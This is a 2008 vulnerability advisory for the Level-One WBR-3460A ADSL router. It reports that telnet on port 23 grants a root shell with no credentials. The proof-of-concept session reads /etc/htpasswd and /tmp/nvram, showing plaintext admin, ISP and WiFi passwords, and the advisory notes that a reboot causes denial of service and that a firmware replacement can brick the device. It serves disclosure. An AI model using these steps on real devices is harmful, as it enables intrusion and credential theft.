Advisory: Level-One WBR-3460A Grants Root Access
Risk: High
Vendor Status: Vendor has not released an updated version
Release Date: 08/01/2008
Last Modified: 01/01/2008
Author: Anastasios Monachos [anastasiosm(at)gmail(dot)com]

I Affected Products:
====================
Level-One WBR-3460A latest firmware available 1.00.12
Level-One WBR-3460A firmware version 1.00.11

II Non-affected Products:
=========================
WBR-3460A comes with firmware version 1.00.06 installed, this happens to
be the only available version that is not affected by the vulnerability
described below, however it lacks of WPA2-PSK support and also of
external/internal port mapping in Virtual servers configuration page,
amongst other things.

II Background:
==============
The Level-One WBR-3460A is an ADSL2/2+ Modem/Wireless Router which runs
Linux BusyBox v0.61.pre on a 32-bit RISC 4KEc V4.8 processor at 211
BogoMIPS, it incorporates 14 MB of RAM and four 10/100 Ethernet ports.

III Description:
================
Performing an nmap scan on the internal address I came up with the
following:

PORT    STATE    SERVICE
23/tcp    open    telnet
80/tcp    open    http

Port 80 gives access through an HTML interface to the configuration menu
as would be expected, but although you can control access to that
interface using a password, there is no control over the telnet port.
So, telnetting to port 23 (on is default IP 192.168.0.1) the users get
automatically access to the filesystem, by providing no credentials at
all. Now the file system of the device may be used for malicious
communication and temporary data storage. Too, a user may download the
upgrade firware's HTML code from the www directory and modify it locally
so allow other files than IMGs to be uploaded and replace the existing
firmware, making the device useless.

Also, one can view the contents of /etc/htpasswd file, where everything
is in plaintext, and retrieve the web-based administrator's (admin)
password. Some of the possible implications, that can be triggered from
the web-interface, but not limited to the following, are:

1. Intruders are now capable to open the configuration page and go
through the submenus where they can get the wireless key in use (the
wireless key is being displayed in plaintext, as well)
2. They can perform a trivial DoS attack (factory restart the modem and
everything stops working) similarly from the telnet session, by issuing
the command "reboot" the device will obey and it will restart itself
3. They can change configurations and policies for clients causing confusion
4. Or they could download a backup copy of the configuration file for
the device (the same file can be obtained by viewing the contents of
"/tmp/nvram"); by viewing that file one can easily extract the ADSL
account logins or any other information is curious about, as everything
is stored in plaintext - once again)

IV Vulnerability Exploited Successfully:
========================================
1. While we were connected through the Ethernet interface, and
2. While we were connected via the security-enabled (WPA2-PSK) wireless
network we had setup (and our wireless NIC's MAC address was in the list
of the trusted MACs)

V Proof of Concept:
===================
tasos@nyx:~$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.

BusyBox v0.61.pre (2007.03.16-05:39+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

# ls
bin   dev   etc   lib   proc  sbin  tmp   usr   var   www
#
# ls /proc/
1            3            84           dma          loadavg      stat
107          3035         86           driver       locks        swaps
108          4            87           execdomains  meminfo      sys
110          43           89           filesystems  misc         sysvipc
111          4456         91           fs           modules      ticfg
112          5            92           interrupts   mounts       tty
1192         5233         avalanche    iomem        mtd          uptime
124          5237         br_filter    ioports      net          version
130          5239         br_trigger   kcore        partitions   wlan
132          6            bus          kmsg         push_button
2            68           cmdline      ksyms        self
20           7            cpuinfo      led          slabinfo
246          80           devices      led_mod      special
#
# cat /etc/htpasswd
admin:MySecretPassword
#
# echo "any data" > /etc/filename
#
# cat /etc/filename
any data
#
# cat /tmp/nvram
IP806GAV3               time_zone=GMT+0 time_daylight= restore_default=0
(...removed for simplicity...)
dhcp_reserved= http_username=admin http_password=32spec904et28
http_timeout=5
(...removed for simplicity...)
pppoe_username=xxxxxxx.xxxxxx.xxxxx@myisp.mycctld pppoe_password=xxxxxxxx
(...removed for simplicity...)
wifi_access_list=00:1B:72:23:00:51Tasos-Laptop
00:01:71:97:86:0BTasos-WDongle
(...removed for simplicity...)
wifi_present=1 wiz_runtest= ipoa_mode=
wifi_psk_pwd=Js5xxkwD3fvtxxxxx645KdLxxxxxx
#

VI Misc:
========
i.   Please note that if the modem/router get power-cycled any file that
had been created earlier will be vanished
ii.  All three versions of the firmware that were tested had no open
ports visible from the Internet

VII References:
===============
i. Level One WBR-3460A - http://global.level1.com/products2.php?Id=821

VIII Disclosure Timeline:
========================
01. January 2008 - Contacted Level-One by email through
http://global.level1.com/email.php (No Response)
08. January 2008 - Advisory was released on SecurityFocus(TM) and
SecurityTracker(SM)

IX Legal Notice:
================
Copyright 2008 Anastasios Monachos [anastasiosm(at)gmail(dot)com]

The information in the advisory is believed to be accurate at the time
of publishing, based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There
are no warranties with regard to this information, and the author does
not accept any liability for any direct, indirect, or consequential
loss or damage arising from use of, or reliance on, this information.

Permission is granted for the redistribution of this alert, as long as
this Legal Notice remains intact.